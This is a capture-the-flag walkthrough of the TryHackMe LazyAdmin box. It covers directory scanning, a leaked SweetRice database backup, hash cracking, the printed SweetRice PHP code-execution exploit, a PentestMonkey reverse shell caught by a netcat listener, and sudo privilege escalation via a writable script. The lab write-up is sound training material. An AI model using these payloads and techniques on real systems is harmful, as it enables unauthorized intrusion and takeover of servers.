THM - Lazy Admin¶
Difficulty: 
Direct link: Module Link
Background
This is going to be a quick walkthrough and brain dump of my experience going through THM LazyAdmin. I am not above using hints. This is all a growing and learning experience for me. This was one of the suggested boxes for Capstone in TCM Security's Linux Privesc Course.
First thing's first lets go ahead and hit it with an NMAP Scan. I could be more targetted but, I like to go basic in CTFs on the first or 2nd one just to get a lay of the land. The -sV flag is checking versions. Anytime I forget what a command does or want to learn more about a specific tool/command I will check the SANS cheatsheet collection first.
Info
The export command is used to set a variable in your current session. This helps you from having to retype the IP address multiple times.
We see an Apache Server 2.4.18 on Line 9 over port 80. That looks like some fun. Let's go do some normal recon on the website and see what we can see or access. We also noticed that SSH is open over port 22. So take note and we might need it later.
Command Output
Since there is an Apache server running lets go see what's loaded on it. Looks like we have some Information Disclosure. Seeing a default page usually means fun.
I decided to check is there was a robots.txt next but, no avail. Lets move onto checking for any common web directories.
Info
The -v flag is verbosity, the -sS flag is for SYN, and the -T4 is just for aggressive scanning.
There seems to be a content directory which is worth some investigations. We can see below on line 6 that /content/ shows up.
Command Output
How nice we got another page with some useful info. Looks like they use SweetRice CMS.
I decided to enumerate the pages a little more but, not a whole lot. Little more recon on Wappalyzer hints at the website being PHP. We already knew it was an Apache Web Server from previous scans.
Let's go ahead pop open msfconsole and do a search with searchsploit SweetRice.
Command Output
If we look into the options provided #11 would be the only one we can currently do without having some other form of access. This would be followed closely by #12. We can lookup that specific plugin by scrolling to the right and grabbing the number of the .txt file. In this case it was 40718.
Command Output
You can either cat /usr/share/exploitdb/exploits/php/webapps/40718.txt or just go to the website. I personally prefer to just read on exploit-db. This tells us that you can access the backups from the /inc/mysql_backup. Sure enough the backup is right in that directory as seen below.
Opening up the DB into my text editor, Atom, and parsing through the information I found a section with what could potentially be admin credentials. It "appears" to be md5 but, tossed into CrackStation just to check.
Bingo! CrackStation was able to identify and crack. Ironically not a strong password. No clue where I could use it but, keeping for safe keeping. I remember it having ssh open so I decided to try it against admin, manager, and root. No Luck.
I thought back to the section in TCM Security's course where he used dirsearch. So let's try another method of directory scanning. Let's do some more into Content since it seems to be the hot commodity.
Info
-u defines the URL, -t is for threads, -w is our directory wordlists. Your's may vary.
Used Command(s)
Command Output
┌──(kali㉿kali)-[~]
└─$ dirsearch -u 10.10.145.116/content -t 100 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 100 | Wordlist size: 220545
Output File: /home/kali/.dirsearch/reports/10.10.145.116-content_22-11-27_01-00-50.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-11-27_01-00-50.log
Target: http://10.10.145.116/content/
[01:00:50] Starting:
[01:00:54] 301 - 323B - /content/images -> http://10.10.145.116/content/images/
[01:00:59] 301 - 319B - /content/js -> http://10.10.145.116/content/js/
[01:01:03] 301 - 320B - /content/inc -> http://10.10.145.116/content/inc/
[01:01:07] 301 - 319B - /content/as -> http://10.10.145.116/content/as/
[01:01:08] 301 - 324B - /content/_themes -> http://10.10.145.116/content/_themes/
[01:01:08] 301 - 327B - /content/attachment -> http://10.10.145.116/content/attachment/
I know from manually digging that not much is in /images, /js, /inc, /_themes. So decided to check out what /as would entail. Bingo, we got a Login Page. We aquired some credentials from earlier so I decided to try out the password we got earlier as Manager and "Password".
Looks like we are in the admin portal for the CMS. I decided to do some digging around. Noticed you could add code into the Ads section. Let's take a look back at the searchsploit search from earlier. There was a option for PHP Code Execution. Which is #10 below.
Command Output
msf6 > searchsploit SweetRice
[*] exec: searchsploit SweetRice
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
SweetRice 0.5.3 - Remote File Inclusion | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution | php/webapps/40700.html
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload | php/webapps/14184.txt
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Let's look into some info on this exploit. Following the same steps as earlier. But, instead let's look at it via cat instead. The nice thing about the searchsploit module is that all the posts are local on the machine in the searches.
Command Output
msf6 > searchsploit -p 40700
[*] exec: searchsploit -p 40700
Exploit: SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution
URL: https://www.exploit-db.com/exploits/40700
Path: /usr/share/exploitdb/exploits/php/webapps/40700.html
File Type: HTML document, ASCII text
msf6 > cat /usr/share/exploitdb/exploits/php/webapps/40700.html
[*] exec: cat /usr/share/exploitdb/exploits/php/webapps/40700.html
---SNIP---
# Exploit :
-->
<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/sweetrice/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="hacked"/>
<textarea type="hidden" name="adv">
<?php
echo '<h1> Hacked </h1>';
phpinfo();?>
</textarea>
</form>
</body>
</html>
<!--
# After HTML File Executed You Can Access Page In
http://localhost/sweetrice/inc/ads/hacked.php
---SNIP---
We can try out the proof of concept or just go straight for a reverse shell. Let's hit up our handy dandy PentestMonkey. We should be adequately familiar with him for usage in CTF Style challenges.
Used Command(s)
Command Output
┌──(kali㉿kali)-[~]
└─$ wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
---SNIP--
2022-11-27 13:51:54 (36.7 MB/s) - ‘php-reverse-shell-1.0.tar.gz’ saved [9018/9018]
┌──(kali㉿kali)-[~]
└─$ tar -xf php-reverse-shell-1.0.tar.gz
┌──(kali㉿kali)-[~]
└─$ cd php-reverse-shell-1.0
In the above snippet we pulled down the bundle from PentesterMonkey's site. I probally should of done it in downloads but, I typically delete after im done to make sure I get recent copies as things change or break from time to time. Then, we un-tar'd it. Changed into the directory.
Now we can use xclip to copy the file contents into the clipboard. You could cat or edit within this location but, since we have the ability to put into the browser I'll edit there.
Info
xclip is a pretty useful tool for just copying the contents of a file.
Paste it into the Ads section of the website. Which you know this by Recon and if you read the exploit it'll tell you. I already modified the lines to reflect my kali machine and port that I want to receive on.
We know from earlier that this file will get uploaded to some directory that we can navigate too. Let's go ahead and setup out netcat listener on the port that we set the RevShell too.
Command Output
We can navigate to the page where the ads upload is at and execute it.
Bingo We are in! Checking who we are with "id". We appear to be www-data which is expected and let's go ahead and upgrade out shell to be a little easier to use. You can check out this link from hacktrick for various other ways. I also have a tab at the top of my website. I checked for python, we had it so used that method to upgrade shell. See highlighted lines below.
Command Output
┌──(kali㉿kali)-[~/php-reverse-shell-1.0]
└─$ nc -lvp 1234
listening on [any] 1234 ...
10.10.55.189: inverse host lookup failed: Unknown host
connect to [10.13.8.49] from (UNKNOWN) [10.10.55.189] 41978
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
21:13:02 up 1:16, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@THM-Chal:/$
Let's see what we can access in the home directories.
Bingo! We found the user flag and what looks like some sql login creds. Sheesh! Next lets work on finding a way to PrivEsc. Let's take a look at sudo -l
Command Output
www-data@THM-Chal:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
I tried a few things couldnt get it to work right and went down a rabbit hole chasing other things. Decided to come back and take a deeper look at the backup.pl
Info
Line #7 shown executed by copy.sh. You can see more examples here.
Command Output
So we see that we have the ability to run sudo without a password on the .pl file which when we read the file is referencing a copy.sh which has a RevShell in it. We can see we have the permissions to edit that file. I tried Vi or Nano since im basic but, no luck so had to edit it via echo.
Used Command(s)
make sure you modify your kali's ip in the echo command.
BOOM!
